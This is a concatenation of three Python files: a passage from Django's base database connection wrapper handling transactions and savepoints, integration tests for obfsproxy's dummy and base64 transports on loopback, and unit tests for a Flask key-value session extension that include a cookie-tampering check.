        self.close_at = None
        self.closed_in_transaction = False
        self.errors_occurred = False
        # Thread-safety related attributes.
        self.allow_thread_sharing = allow_thread_sharing
        self._thread_ident = _thread.get_ident()
        # A list of no-argument functions to run when the transaction commits.
        # Each entry is an (sids, func) tuple, where sids is a set of the
        # active savepoint IDs when this function was registered.
        self.run_on_commit = []
        # Should we run the on-commit hooks the next time set_autocommit(True)
        # is called?
        self.run_commit_hooks_on_set_autocommit_on = False
        # A stack of wrappers to be invoked around execute()/executemany()
        # calls. Each entry is a function taking five arguments: execute, sql,
        # params, many, and context. It's the function's responsibility to
        # call execute(sql, params, many, context).
        self.execute_wrappers = []
        self.client = self.client_class(self)
        self.creation = self.creation_class(self)
        self.features = self.features_class(self)
        self.introspection = self.introspection_class(self)
        self.ops = self.ops_class(self)
        self.validation = self.validation_class(self)

    def ensure_timezone(self):
        """
        Ensure the connection's timezone is set to `self.timezone_name` and
        return whether it changed or not.
        """
        return False

    @cached_property
    def timezone(self):
        """
        Time zone for datetimes stored as naive values in the database.
        Return a tzinfo object or None.
        This is only needed when time zone support is enabled and the database
        doesn't support time zones. (When the database supports time zones,
        the adapter handles aware datetimes so Django doesn't need to.)
        """
        if not settings.USE_TZ:
            return None
        elif self.features.supports_timezones:
            return None
        elif self.settings_dict['TIME_ZONE'] is None:
            return timezone.utc
        else:
            return pytz.timezone(self.settings_dict['TIME_ZONE'])

    @cached_property
    def timezone_name(self):
        """
        Name of the time zone of the database connection.
        """
        if not settings.USE_TZ:
            return settings.TIME_ZONE
        elif self.settings_dict['TIME_ZONE'] is None:
            return 'UTC'
        else:
            return self.settings_dict['TIME_ZONE']

    @property
    def queries_logged(self):
        # Queries are logged when debug cursors are forced or DEBUG is on.
        return self.force_debug_cursor or settings.DEBUG

    @property
    def queries(self):
        # Warn when the bounded log has filled up: older entries were lost.
        if len(self.queries_log) == self.queries_log.maxlen:
            warnings.warn(
                "Limit for query logging exceeded, only the last {} queries "
                "will be returned.".format(self.queries_log.maxlen))
        return list(self.queries_log)

    # ##### Backend-specific methods for creating connections and cursors #####

    def get_connection_params(self):
        """Return a dict of parameters suitable for get_new_connection."""
        raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_connection_params() method')

    def get_new_connection(self, conn_params):
        """Open a connection to the database."""
        raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_new_connection() method')

    def init_connection_state(self):
        """Initialize the database connection settings."""
        raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an init_connection_state() method')

    def create_cursor(self, name=None):
        """Create a cursor. Assume that a connection is established."""
        raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a create_cursor() method')

    # ##### Backend-specific methods for creating connections #####

    def connect(self):
        """Connect to the database. Assume that the connection is closed."""
        # Check for invalid configurations.
        self.check_settings()
        # In case the previous connection was closed while in an atomic block
        self.in_atomic_block = False
        self.savepoint_ids = []
        self.needs_rollback = False
        # Reset parameters defining when to close the connection
        max_age = self.settings_dict['CONN_MAX_AGE']
        self.close_at = None if max_age is None else time.time() + max_age
        self.closed_in_transaction = False
        self.errors_occurred = False
        # Establish the connection
        conn_params = self.get_connection_params()
        self.connection = self.get_new_connection(conn_params)
        self.set_autocommit(self.settings_dict['AUTOCOMMIT'])
        self.init_connection_state()
        connection_created.send(sender=self.__class__, connection=self)
        self.run_on_commit = []

    def check_settings(self):
        # TIME_ZONE is only meaningful with USE_TZ and a backend that does
        # not handle time zones natively.
        if self.settings_dict['TIME_ZONE'] is not None:
            if not settings.USE_TZ:
                raise ImproperlyConfigured(
                    "Connection '%s' cannot set TIME_ZONE because USE_TZ is "
                    "False." % self.alias)
            elif self.features.supports_timezones:
                raise ImproperlyConfigured(
                    "Connection '%s' cannot set TIME_ZONE because its engine "
                    "handles time zones conversions natively." % self.alias)

    def ensure_connection(self):
        """Guarantee that a connection to the database is established."""
        if self.connection is None:
            with self.wrap_database_errors:
                self.connect()

    # ##### Backend-specific wrappers for PEP-249 connection methods #####

    def _prepare_cursor(self, cursor):
        """
        Validate the connection is usable and perform database cursor wrapping.
        """
        self.validate_thread_sharing()
        if self.queries_logged:
            wrapped_cursor = self.make_debug_cursor(cursor)
        else:
            wrapped_cursor = self.make_cursor(cursor)
        return wrapped_cursor

    def _cursor(self, name=None):
        self.ensure_connection()
        with self.wrap_database_errors:
            return self._prepare_cursor(self.create_cursor(name))

    def _commit(self):
        if self.connection is not None:
            with self.wrap_database_errors:
                return self.connection.commit()

    def _rollback(self):
        if self.connection is not None:
            with self.wrap_database_errors:
                return self.connection.rollback()

    def _close(self):
        if self.connection is not None:
            with self.wrap_database_errors:
                return self.connection.close()

    # ##### Generic wrappers for PEP-249 connection methods #####

    def cursor(self):
        """Create a cursor, opening a connection if necessary."""
        return self._cursor()

    def commit(self):
        """Commit a transaction and reset the dirty flag."""
        self.validate_thread_sharing()
        self.validate_no_atomic_block()
        self._commit()
        # A successful commit means that the database connection works.
        self.errors_occurred = False
        self.run_commit_hooks_on_set_autocommit_on = True

    def rollback(self):
        """Roll back a transaction and reset the dirty flag."""
        self.validate_thread_sharing()
        self.validate_no_atomic_block()
        self._rollback()
        # A successful rollback means that the database connection works.
        self.errors_occurred = False
        self.needs_rollback = False
        self.run_on_commit = []

    def close(self):
        """Close the connection to the database."""
        self.validate_thread_sharing()
        self.run_on_commit = []
        # Don't call validate_no_atomic_block() to avoid making it difficult
        # to get rid of a connection in an invalid state. The next connect()
        # will reset the transaction state anyway.
        if self.closed_in_transaction or self.connection is None:
            return
        try:
            self._close()
        finally:
            if self.in_atomic_block:
                self.closed_in_transaction = True
                self.needs_rollback = True
            else:
                self.connection = None

    # ##### Backend-specific savepoint management methods #####

    def _savepoint(self, sid):
        with self.cursor() as cursor:
            cursor.execute(self.ops.savepoint_create_sql(sid))

    def _savepoint_rollback(self, sid):
        with self.cursor() as cursor:
            cursor.execute(self.ops.savepoint_rollback_sql(sid))

    def _savepoint_commit(self, sid):
        with self.cursor() as cursor:
            cursor.execute(self.ops.savepoint_commit_sql(sid))

    def _savepoint_allowed(self):
        # Savepoints cannot be created outside a transaction
        return self.features.uses_savepoints and not self.get_autocommit()

    # ##### Generic savepoint management methods #####

    def savepoint(self):
        """
        Create a savepoint inside the current transaction. Return an
        identifier for the savepoint that will be used for the subsequent
        rollback or commit. Do nothing if savepoints are not supported.
        """
        if not self._savepoint_allowed():
            return
        thread_ident = _thread.get_ident()
        tid = str(thread_ident).replace('-', '')
        self.savepoint_state += 1
        sid = "s%s_x%d" % (tid, self.savepoint_state)
        self.validate_thread_sharing()
        self._savepoint(sid)
        return sid

    def savepoint_rollback(self, sid):
        """
        Roll back to a savepoint. Do nothing if savepoints are not supported.
        """
        if not self._savepoint_allowed():
            return
        self.validate_thread_sharing()
        self._savepoint_rollback(sid)
        # Remove any callbacks registered while this savepoint was active.
        self.run_on_commit = [
            (sids, func) for (sids, func) in self.run_on_commit if sid not in sids
        ]

    def savepoint_commit(self, sid):
        """
        Release a savepoint. Do nothing if savepoints are not supported.
        """
        if not self._savepoint_allowed():
            return
        self.validate_thread_sharing()
        self._savepoint_commit(sid)

    def clean_savepoints(self):
        """
        Reset the counter used to generate unique savepoint ids in this thread.
        """
        self.savepoint_state = 0

    # ##### Backend-specific transaction management methods #####

    def _set_autocommit(self, autocommit):
        """
        Backend-specific implementation to enable or disable autocommit.
        """
        raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _set_autocommit() method')

    # ##### Generic transaction management methods #####

    def get_autocommit(self):
        """Get the autocommit state."""
        self.ensure_connection()
        return self.autocommit

    def set_autocommit(self, autocommit, force_begin_transaction_with_broken_autocommit=False):
        """
        Enable or disable autocommit.
        The usual way to start a transaction is to turn autocommit off.
        SQLite does not properly start a transaction when disabling
        autocommit. To avoid this buggy behavior and to actually enter a new
        transaction, an explicit BEGIN is required. Using
        force_begin_transaction_with_broken_autocommit=True will issue an
        explicit BEGIN with SQLite. This option will be ignored for other
        backends.
        """
        self.validate_no_atomic_block()
        self.ensure_connection()
        start_transaction_under_autocommit = (
            force_begin_transaction_with_broken_autocommit and not autocommit and
            hasattr(self, '_start_transaction_under_autocommit')
        )
        if start_transaction_under_autocommit:
            self._start_transaction_under_autocommit()
        else:
            self._set_autocommit(autocommit)
        self.autocommit = autocommit
        # Re-enabling autocommit after a commit() may have pending hooks.
        if autocommit and self.run_commit_hooks_on_set_autocommit_on:
            self.run_and_clear_commit_hooks()
            self.run_commit_hooks_on_set_autocommit_on = False

    def get_rollback(self):
        """Get the "needs rollback" flag -- for *advanced use* only."""
        if not self.in_atomic_block:
            raise TransactionManagementError(
                "The rollback flag doesn't work outside of an 'atomic' block.")
        return self.needs_rollback

    def set_rollback(self, rollback):
        """
        Set or unset the "needs rollback" flag -- for *advanced use* only.
        """
        if not self.in_atomic_block:
            raise TransactionManagementError(
                "The rollback flag doesn't work outside of an 'atomic' block.")
        self.needs_rollback = rollback

    def validate_no_atomic_block(self):
        """Raise an error if an atomic block is active."""
        if self.in_atomic_block:
            raise TransactionManagementError(
                "This is forbidden when an 'atomic' block is active.")

    def validate_no_broken_transaction(self):
        """Raise an error if the current transaction needs a rollback."""
        if self.needs_rollback:
            raise TransactionManagementError(
                "An error occurred in the current transaction. You can't "
                "execute queries until the end of the 'atomic' block.")

    # ##### Foreign key constraints checks handling #####

    @contextmanager
    def constraint_checks_disabled(self):
        """
        Disable foreign key constraint checking.
        """
        disabled = self.disable_constraint_checking()
        try:
            yield
        finally:
            if disabled:
                self.enable_constraint_checking()

    def disable_constraint_checking(self):
        """
        Backends can implement as needed to temporarily disable foreign key
        constraint checking. Should return True if the constraints were
        disabled and will need to be reenabled.
        """
        return False

    def enable_constraint_checking(self):
        """
        Backends can implement as needed to re-enable foreign key constraint
        checking.
        """
        pass

    def check_constraints(self, table_names=None):
        """
        Backends can override this method if they can apply constraint
        checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE"). Should raise an
        IntegrityError if any invalid foreign key references are encountered.
        """
        pass

    # ##### Connection termination handling #####

    def is_usable(self):
        """
        Test if the database connection is usable.
        This method may assume that self.connection is not None.
        Actual implementations should take care not to raise exceptions
        as that may prevent Django from recycling unusable connections.
        """
        raise NotImplementedError(
            "subclasses of BaseDatabaseWrapper may require an is_usable() method")

    def close_if_unusable_or_obsolete(self):
        """
        Close the current connection if unrecoverable errors have occurred
        or if it outlived its maximum age.
        """
        if self.connection is not None:
            # If the application didn't restore the original autocommit setting,
            # don't take chances, drop the connection.
            if self.get_autocommit() != self.settings_dict['AUTOCOMMIT']:
                self.close()
                return
            # If an exception other than DataError or IntegrityError occurred
            # since the last commit / rollback, check if the connection works.
            if self.errors_occurred:
                if self.is_usable():
                    self.errors_occurred = False
                else:
                    self.close()
                    return
            if self.close_at is not None and time.time() >= self.close_at:
                self.close()
                return

    # ##### Thread safety handling #####

    def validate_thread_sharing(self):
        """
        Validate that the connection isn't accessed by another thread than the
        one which originally created it, unless the connection was explicitly
        authorized to be shared between threads (via the `allow_thread_sharing`
        property). Raise an exception if the validation fails.
        """
        if not (self.allow_thread_sharing or self._thread_ident == _thread.get_ident()):
            raise DatabaseError(
                "DatabaseWrapper objects created in a "
                "thread can only be used in that same thread. The object "
                "with alias '%s' was created in thread id %s and this is "
                "thread id %s."
                % (self.alias, self._thread_ident, _thread.get_ident())
            )

    # ##### Miscellaneous #####

    def prepare_database(self):
        """
        Hook to do any database check or preparation, generally called before
        migrating a project or an app.
        """
        pass

    @cached_property
    def wrap_database_errors(self):
        """
        Context manager and decorator that re-throws backend-specific database
        exceptions using Django's common wrappers.
        """
        return DatabaseErrorWrapper(self)

    def chunked_cursor(self):
        """
        Return a cursor that tries to avoid caching in the database (if
        supported by the database), otherwise return a regular cursor.
        """
        return self.cursor()

    def make_debug_cursor(self, cursor):
        """Create a cursor that logs all queries in self.queries_log."""
        return utils.CursorDebugWrapper(cursor, self)

    def make_cursor(self, cursor):
        """Create a cursor without debug logging."""
        return utils.CursorWrapper(cursor, self)

    @contextmanager
    def temporary_connection(self):
        """
        Context manager that ensures that a connection is established, and
        if it opened one, closes it to avoid leaving a dangling connection.
        This is useful for operations outside of the request-response cycle.
        Provide a cursor: with self.temporary_connection() as cursor: ...
        """
        must_close = self.connection is None
        try:
            with self.cursor() as cursor:
                yield cursor
        finally:
            if must_close:
                self.close()

    @property
    def _nodb_connection(self):
        """
        Return an alternative connection to be used when there is no need to
        access the main database, specifically for test db creation/deletion.
        This also prevents the production database from being exposed to
        potential child threads while (or after) the test database is destroyed.
        Refs #10868, #17786, #16969.
        """
        return self.__class__(
            {**self.settings_dict, 'NAME': None},
            alias=NO_DB_ALIAS,
            allow_thread_sharing=False,
        )

    def schema_editor(self, *args, **kwargs):
        """
        Return a new instance of this backend's SchemaEditor.
        """
        if self.SchemaEditorClass is None:
            raise NotImplementedError(
                'The SchemaEditorClass attribute of this database wrapper is still None')
        return self.SchemaEditorClass(self, *args, **kwargs)

    def on_commit(self, func):
        """Register *func* to run when the current transaction commits."""
        if self.in_atomic_block:
            # Transaction in progress; save for execution on commit.
            self.run_on_commit.append((set(self.savepoint_ids), func))
        elif not self.get_autocommit():
            raise TransactionManagementError('on_commit() cannot be used in manual transaction management')
        else:
            # No transaction in progress and in autocommit mode; execute
            # immediately.
            func()

    def run_and_clear_commit_hooks(self):
        """Execute and discard all registered on-commit callbacks."""
        self.validate_no_atomic_block()
        current_run_on_commit = self.run_on_commit
        self.run_on_commit = []
        while current_run_on_commit:
            sids, func = current_run_on_commit.pop(0)
            func()

    @contextmanager
    def execute_wrapper(self, wrapper):
        """
        Return a context manager under which the wrapper is applied to suitable
        database query executions.
        """
        self.execute_wrappers.append(wrapper)
        try:
            yield
        finally:
            self.execute_wrappers.pop()

    def copy(self, alias=None, allow_thread_sharing=None):
        """
        Return a copy of this connection.
        For tests that require two connections to the same database.
        """
        settings_dict = copy.deepcopy(self.settings_dict)
        if alias is None:
            alias = self.alias
        if allow_thread_sharing is None:
            allow_thread_sharing = self.allow_thread_sharing
        return type(self)(settings_dict, alias, allow_thread_sharing)
| |
#!/usr/bin/python
"""@package tester.py.in
Integration tests for obfsproxy.
The obfsproxy binary is assumed to exist in the current working
directory, and you need to have Python 2.6 or better (but not 3).
You need to be able to make connections to arbitrary high-numbered
TCP ports on the loopback interface.
"""
import difflib
import errno
import multiprocessing
import Queue
import re
import signal
import socket
import struct
import subprocess
import time
import traceback
import unittest
def diff(label, expected, received):
    """
    Helper: generate unified-format diffs between two named strings.
    Pythonic escaped-string syntax is used for unprintable characters.
    Returns "" when the strings are equal.
    """
    if expected == received:
        return ""
    delta = difflib.unified_diff(expected.split("\n"),
                                 received.split("\n"),
                                 "expected", "received",
                                 lineterm="")
    escaped = "\n".join(line.encode("string_escape") for line in delta)
    return label + "\n" + escaped + "\n"
class Obfsproxy(subprocess.Popen):
    """
    Helper: Run obfsproxy instances and confirm that they have
    completed without any errors.
    """
    def __init__(self, *args, **kwargs):
        """Spawns obfsproxy with 'args'"""
        # Always run the sibling script with logging disabled so that
        # stderr carries only messages worth checking below.
        argv = ["../../obfsproxy.py", "--no-log"]
        # Accept either a single list/tuple of arguments or varargs.
        if len(args) == 1 and (isinstance(args[0], list) or
                               isinstance(args[0], tuple)):
            argv.extend(args[0])
        else:
            argv.extend(args)
        subprocess.Popen.__init__(self, argv,
                                  stdin=open("/dev/null", "r"),
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE,
                                  **kwargs)
    # Matches the [warn], [err] or [error] tags in obfsproxy's log output.
    severe_error_re = re.compile(r"\[(?:warn|err(?:or)?)\]")
    def check_completion(self, label, force_stderr):
        """
        Checks the output and exit status of obfsproxy to see if
        everything went fine.
        Returns an empty string if the test was good, otherwise it
        returns a report that should be printed to the user.
        """
        # Interrupt the process first if it is still running, then collect
        # both output streams (communicate() also waits for exit).
        if self.poll() is None:
            self.send_signal(signal.SIGINT)
        (out, err) = self.communicate()
        report = ""
        def indent(s):
            return "| " + "\n| ".join(s.strip().split("\n"))
        # exit status should be zero
        if self.returncode > 0:
            report += label + " exit code: %d\n" % self.returncode
        elif self.returncode < 0:
            report += label + " killed: signal %d\n" % -self.returncode
        # there should be nothing on stdout
        if out != "":
            report += label + " stdout:\n%s\n" % indent(out)
        # there will be debugging messages on stderr, but there should be
        # no [warn], [err], or [error] messages.
        if force_stderr or self.severe_error_re.search(err):
            report += label + " stderr:\n%s\n" % indent(err)
        return report
    def stop(self):
        """Terminates obfsproxy."""
        if self.poll() is None:
            self.terminate()
def connect_with_retry(addr):
    """
    Helper: Repeatedly try to connect to the specified server socket
    until either it succeeds or one full second has elapsed. (Surely
    there is a better way to do this?)

    'addr' is a (host, port) pair.  Returns the connected socket;
    re-raises the last socket.error after 20 refused attempts, and
    propagates any error other than "connection refused" immediately.
    """
    retry = 0
    while True:
        try:
            return socket.create_connection(addr)
        # 'except E as e' replaces the Python-2-only 'except E, e' form;
        # it is valid on Python 2.6+ (this script's stated minimum) and 3.
        except socket.error as e:
            if e.errno != errno.ECONNREFUSED: raise
            if retry == 20: raise
            retry += 1
            time.sleep(0.05)
SOCKET_TIMEOUT = 1.0
class ReadWorker(object):
    """
    Helper: In a separate process (to avoid deadlock), listen on a
    specified socket. The first time something connects to that socket,
    read all available data, stick it in a string, and post the string
    to the output queue. Then close both sockets and exit.
    """
    @staticmethod
    def work(address, oq):
        """Worker-process body: accept one connection, drain it, post data."""
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind(address)
        listener.listen(1)
        (conn, remote) = listener.accept()
        listener.close()
        conn.settimeout(SOCKET_TIMEOUT)
        data = ""
        try:
            while True:
                chunk = conn.recv(4096)
                if chunk == "": break
                data += chunk
        except socket.timeout:
            pass
        except Exception as e:
            # Bug fix: the exception must be converted to a string before
            # concatenation -- "str + exception" raises TypeError, which
            # would silently discard both the data and the error report.
            data += "|RECV ERROR: " + str(e)
        conn.close()
        oq.put(data)
    def __init__(self, address):
        """Start a worker process listening on 'address' (host, port)."""
        self.oq = multiprocessing.Queue()
        self.worker = multiprocessing.Process(target=self.work,
                                              args=(address, self.oq))
        self.worker.start()
    def get(self):
        """
        Get a chunk of data from the ReadWorker's queue.
        Waits slightly longer than the socket timeout, then joins the
        worker process.
        """
        rv = self.oq.get(timeout=SOCKET_TIMEOUT+0.1)
        self.worker.join()
        return rv
    def stop(self):
        """Terminate the worker process if it is still running."""
        if self.worker.is_alive(): self.worker.terminate()
# Right now this is a direct translation of the former int_test.sh
# (except that I have fleshed out the SOCKS test a bit).
# It will be made more general and parametric Real Soon.
ENTRY_PORT = 4999
SERVER_PORT = 5000
EXIT_PORT = 5001
#
# Test base classes. They do _not_ inherit from unittest.TestCase
# so that they are not scanned directly for test functions (some of
# them do provide test functions, but not in a usable state without
# further code from subclasses).
#
class DirectTest(object):
    # Mixin providing setup/teardown and the transfer test for "direct"
    # (non-SOCKS) obfsproxy configurations.  Subclasses must supply the
    # 'server_args' and 'client_args' tuples; they also inherit from
    # unittest.TestCase so the test method is picked up.
    def setUp(self):
        # Pipeline: input_chan -> client -> server -> output_reader.
        self.output_reader = ReadWorker(("127.0.0.1", EXIT_PORT))
        self.obfs_server = Obfsproxy(self.server_args)
        self.obfs_client = Obfsproxy(self.client_args)
        self.input_chan = connect_with_retry(("127.0.0.1", ENTRY_PORT))
        self.input_chan.settimeout(SOCKET_TIMEOUT)
    def tearDown(self):
        # Stop the proxies before the reader so nothing reconnects.
        self.obfs_client.stop()
        self.obfs_server.stop()
        self.output_reader.stop()
        self.input_chan.close()
    def test_direct_transfer(self):
        # Open a server and a simple client (in the same process) and
        # transfer a file. Then check whether the output is the same
        # as the input.
        self.input_chan.sendall(TEST_FILE)
        try:
            output = self.output_reader.get()
        except Queue.Empty:
            output = ""
        self.input_chan.close()
        # Force a stderr dump from both proxies whenever the transfer
        # itself failed, so the report includes their logs.
        report = diff("errors in transfer:", TEST_FILE, output)
        report += self.obfs_client.check_completion("obfsproxy client", report!="")
        report += self.obfs_server.check_completion("obfsproxy server", report!="")
        if report != "":
            self.fail("\n" + report)
#
# Concrete test classes specialize the above base classes for each protocol.
#
class DirectDummy(DirectTest, unittest.TestCase):
    # Direct transfer through the "dummy" (pass-through) protocol.
    server_args = ("dummy", "server",
                   "127.0.0.1:%d" % SERVER_PORT,
                   "--dest=127.0.0.1:%d" % EXIT_PORT)
    client_args = ("dummy", "client",
                   "127.0.0.1:%d" % ENTRY_PORT,
                   "--dest=127.0.0.1:%d" % SERVER_PORT)
class DirectB64(DirectTest, unittest.TestCase):
    # Direct transfer through the "b64" (base64-encoding) protocol.
    server_args = ("b64", "server",
                   "127.0.0.1:%d" % SERVER_PORT,
                   "--dest=127.0.0.1:%d" % EXIT_PORT)
    client_args = ("b64", "client",
                   "127.0.0.1:%d" % ENTRY_PORT,
                   "--dest=127.0.0.1:%d" % SERVER_PORT)
TEST_FILE = """\
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
THIS IS A TEST FILE. IT'S USED BY THE INTEGRATION TESTS.
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
"Can entropy ever be reversed?"
"THERE IS AS YET INSUFFICIENT DATA FOR A MEANINGFUL ANSWER."
In obfuscatory age geeky warfare did I wage
For hiding bits from nasty censors' sight
I was hacker to my set in that dim dark age of net
And I hacked from noon till three or four at night
Then a rival from Helsinki said my protocol was dinky
So I flamed him with a condescending laugh,
Saying his designs for stego might as well be made of lego
And that my bikeshed was prettier by half.
But Claude Shannon saw my shame. From his noiseless channel came
A message sent with not a wasted byte
"There are nine and sixty ways to disguise communiques
And RATHER MORE THAN ONE OF THEM IS RIGHT"
(apologies to Rudyard Kipling.)
"""
if __name__ == '__main__':
unittest.main()
| |
#!/usr/bin/env python
# coding=utf8
from datetime import timedelta, datetime
import json
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import time
from flask import Flask, session
from flaskext.kvsession import SessionID, KVSessionExtension, KVSession
from itsdangerous import Signer
from simplekv.memory import DictStore
class TestSessionID(unittest.TestCase):
    """Unit tests for the SessionID helper."""
    def test_serialize(self):
        now = int(time.time())
        created = datetime.utcfromtimestamp(now)
        sid = SessionID(1234, created)
        self.assertEqual('%x_%x' % (1234, now), sid.serialize())
    def test_automatic_created_date(self):
        before = datetime.utcnow()
        sid = SessionID(0)
        after = datetime.utcnow()
        self.assertTrue(before <= sid.created <= after)
    def test_serialize_unserialize(self):
        created = datetime(2011, 7, 9, 13, 14, 15)
        session_id = 59034
        sid = SessionID(session_id, created)
        serialized = sid.serialize()
        # Creating an unrelated instance must not affect unserialization.
        SessionID(123)
        restored = sid.unserialize(serialized)
        self.assertEqual(sid.id, restored.id)
        self.assertEqual(sid.created, restored.created)
def create_app(store):
    """Build the sample Flask application used by the tests.

    The KVSessionExtension is bound to 'store'.  Each route exposes one
    session operation (store, delete, destroy, regenerate, dump, ...) so
    the tests can drive the session machinery over HTTP.

    NOTE: the inner function names double as Flask endpoint names, so
    they must not be renamed.
    """
    app = Flask(__name__)
    app.kvsession = KVSessionExtension(store, app)
    @app.route('/')
    def index():
        return 'nothing to see here, move along'
    @app.route('/store-in-session/<key>/<value>/')
    def store(key, value):
        session[key] = value
        return 'stored %r at %r' % (value, key)
    @app.route('/store-datetime/')
    def store_datetime():
        t = datetime(2011, 8, 10, 15, 46, 00)
        session['datetime_key'] = t
        return 'ok'
    @app.route('/delete-from-session/<key>/')
    def delete(key):
        del session[key]
        return 'deleted %r' % key
    @app.route('/destroy-session/')
    def destroy():
        session.destroy()
        return 'session destroyed'
    @app.route('/make-session-permanent/')
    def make_permanent():
        session.permanent = True
        return 'made session permanent'
    @app.route('/dump-session/')
    def dump():
        return json.dumps(dict(session))
    @app.route('/dump-datetime/')
    def dump_datetime():
        return str(session['datetime_key'])
    @app.route('/regenerate-session/')
    def regenerate():
        session.regenerate()
        return 'session regenerated'
    @app.route('/is-kvsession/')
    def is_kvsession():
        return str(isinstance(session._get_current_object(), KVSession))
    @app.route('/is-new-session/')
    def is_new_session():
        return str(session.new)
    return app
class TestSampleApp(unittest.TestCase):
    """Integration tests driving the sample app through Flask's test client.

    Python-2-era code: relies on xrange and indexable dict.keys().
    """
    def setUp(self):
        self.store = DictStore()
        self.app = create_app(self.store)
        self.app.config['TESTING'] = True
        self.app.config['SECRET_KEY'] = 'devkey'
        self.client = self.app.test_client()
    def split_cookie(self, rv):
        """Return the [sid, created] parts of the signed session cookie.

        Returns None when the response carries no session cookie.
        """
        signer = Signer(self.app.secret_key)
        cookie_data = rv.headers['Set-Cookie'].split(';', 1)[0]
        for cookie in cookie_data.split('&'):
            # Bug fix: split the individual 'cookie', not the whole
            # 'cookie_data' string (the loop variable was unused), and
            # split on the first '=' only so a value containing '='
            # does not break the unpacking.
            name, value = cookie.split('=', 1)
            if name == self.app.session_cookie_name:
                unsigned_value = signer.unsign(value)
                return unsigned_value.split('_')
    def get_session_cookie(self):
        # Reach into the test client's cookie jar for the raw Cookie object.
        return self.client.cookie_jar.\
            _cookies['localhost.local']['/']['session']
    def test_app_setup(self):
        pass
    def test_app_request_no_extras(self):
        rv = self.client.get('/')
        self.assertIn('move along', rv.data)
    def test_no_session_usage_uses_no_storage(self):
        self.client.get('/')
        self.client.get('/')
        self.assertEqual({}, self.store.d)
    def test_session_usage(self):
        self.client.get('/store-in-session/foo/bar/')
        self.assertNotEqual({}, self.store.d)
    def test_proper_cookie_received(self):
        rv = self.client.get('/store-in-session/bar/baz/')
        sid, created = self.split_cookie(rv)
        self.assertNotEqual(int(created, 16), 0)
        # check sid in store
        key = '%s_%s' % (sid, created)
        self.assertIn(key, self.store)
    def test_session_restores_properly(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/store-in-session/k2/value2/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        self.assertEqual(s['k2'], 'value2')
    def test_manipulation_caught(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        # now manipulate cookie: flipping any single character of the
        # signed value must invalidate the whole session
        cookie = self.get_session_cookie()
        v_orig = cookie.value
        for i in xrange(len(v_orig)):
            broken_value = v_orig[:i] +\
                           ('a' if v_orig[i] != 'a' else 'b') +\
                           v_orig[i + 1:]
            cookie.value = broken_value
            rv = self.client.get('/dump-session/')
            s = json.loads(rv.data)
            self.assertEqual(s, {})
    def test_can_change_values(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        rv = self.client.get('/store-in-session/k1/value2/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value2')
    def test_can_delete_values(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/store-in-session/k2/value2/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        self.assertEqual(s['k2'], 'value2')
        rv = self.client.get('/delete-from-session/k1/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertNotIn('k1', s)
        self.assertEqual(s['k2'], 'value2')
    def test_can_destroy_sessions(self):
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/store-in-session/k2/value2/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        self.assertEqual(s['k2'], 'value2')
        # destroy session
        rv = self.client.get('/destroy-session/')
        self.assertIn('session destroyed', rv.data)
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s, {})
    def test_session_expires(self):
        # set expiration to 1 second
        self.app.permanent_session_lifetime = timedelta(seconds=1)
        rv = self.client.get('/store-in-session/k1/value1/')
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        rv = self.client.get('/make-session-permanent/')
        # assert that the session has a non-zero timestamp
        sid, created = self.split_cookie(rv)
        self.assertNotEqual(0, int(created, 16))
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s['k1'], 'value1')
        # sleep two seconds
        time.sleep(2)
        rv = self.client.get('/dump-session/')
        s = json.loads(rv.data)
        self.assertEqual(s, {})
    def test_session_cleanup_works(self):
        # set expiration to 1 second
        self.app.permanent_session_lifetime = timedelta(seconds=1)
        self.client.get('/store-in-session/k1/value1/')
        self.client.get('/make-session-permanent/')
        # assume there is a valid session, even after cleanup
        self.assertNotEqual({}, self.store.d)
        self.app.kvsession.cleanup_sessions(self.app)
        self.assertNotEqual({}, self.store.d)
